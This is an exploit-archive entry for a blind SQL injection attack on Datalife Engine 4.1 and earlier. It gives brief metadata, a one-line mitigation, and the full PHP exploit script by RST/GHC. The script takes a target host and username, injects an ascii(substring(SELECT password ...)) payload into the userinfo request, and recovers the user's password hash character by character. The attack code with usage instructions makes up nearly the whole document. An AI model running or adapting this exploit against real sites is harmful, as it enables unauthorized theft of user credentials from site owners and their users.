RST/GHC Datalife SQL injection exploit

vendor:

Datalife Engine

by:

RST/GHC

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Datalife Engine

Affected Version From: DLE <=4.1

Affected Version To: DLE <=4.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

RST/GHC Datalife SQL injection exploit

This exploit is a Lite Version for DLE <=4.1. It is used to get the hash for the password of a user by exploiting a SQL injection vulnerability. The exploit defines the user ID, and then tries to get the hash for the password of the user with the specified ID. It then defines the table prefix, and checks if the site is vulnerable. It then uses a blind function to get the hash for the password of the user.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

<?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);

echo '
+========================================+
| RST/GHC Datalife SQL injection exploit |
+========================================+
<    >  Lite Version for DLE <=4.1  <    >
';

if ($argc < 2 ){
print " Usage: " . $argv[0] . " <host> <user> [table prefix]\n";
print " ex.: " . $argv[0] . " datalife.engine.net admin\n";
credits();
exit;
}

//DEFINE USER ID
$urla = 'http://' . $argv[1] . '/index.php?subaction=userinfo&user=' . $argv[2];
$result = file_get_contents($urla);
$str1 = 'user='; #index.php?do=pm&doaction=newpm&user=
$position = strpos($result, $str1);

if ($position === false){ print "\n\rSorry, no match found for user " . $argv[2]; credits();}
$str2 = '">';
$pos = strpos($result, $str2, $position);
$pos1 = $position+5;
$user_id = intval(substr($result, $pos1, $pos-$pos1));

print "Trying to get hash for password of user ". $argv[2] ." with id=" . $user_id . ":\n";

//SOME defines (aka CONFIG =))
if (empty($argv[3])){ $prefix = 'dle_';} #define prefix of the tables. try to find it yourself =) it is easy =)
else {$prefix = $argv[3];}
$min = 48;  # 0
$max = 122; # z
if (check(">$min", 1) == 0 && check("<$max", 1) == 0) {print "\n Site is unvulnerable..."; credits();}
for ($sn=1; $sn <= 32; $sn++) {
   blind($sn, $min, $max);
}
credits();


// REQUEST function
function check($crcheck, $sn)
{
   global $argv, $user_id, $prefix;
$host   = 'http://' . $argv[1] . '/index.php'; # argv[1] - host
$name = $argv[2]; #user name
$query  = '?subaction=userinfo&user=' . $name .'%2527%20and%20ascii(substring((SELECT%20password%20FROM%20' . $prefix. 'users%20WHERE%20user_id='. $user_id .'),' . $sn . ',1))' .$crcheck . '/*'; #

$http = $host . $query;
#DEBUG
#print $http . "\n";
 $result = file_get_contents($http);
 
 // checking the answer
 $string = ': '.$name.'</h2>'; #CORRECT it FOR your version, kids =)
#good idea is: 'do=pm&doaction=newpm&user='.$user_id;
 
   if (eregi($string, $result)) { return 1; }

 return 0;
}

//range function
function blind($sn, $fmin, $fmax)
{
 if (($fmax-$fmin)<5) { if (crack($fmin, $fmax, $sn) == 0){print "\n\rEXPLOIT FAILED..."; credits();} return;}
 $compare = intval($fmin + ($fmax-$fmin)/2);
 $crcheck = ">". $compare;
 if ( check($crcheck, $sn) == 1 ) {
    blind($sn, $compare, $fmax);
    }
 else {
    blind($sn, $fmin, $compare+1); }
}

//brute function
function crack($cmin, $cmax, $sn)
{
 for ($i=$cmin; $i <=$cmax; $i++){
   $crcheck = "=$i";
   if (check($crcheck, $sn) == 1){print chr($i); return 1;}
 }
return 0;
}


function credits(){
print "\n\n+========================================+\n\r Credits: 1dt.w0lf & foster \n\r Copyright (c) RST/GHC";
print "\n\r http://rst.void.ru && http://ghc.ru\n\r+========================================+\n";
exit;
}

?>

# milw0rm.com [2006-06-21]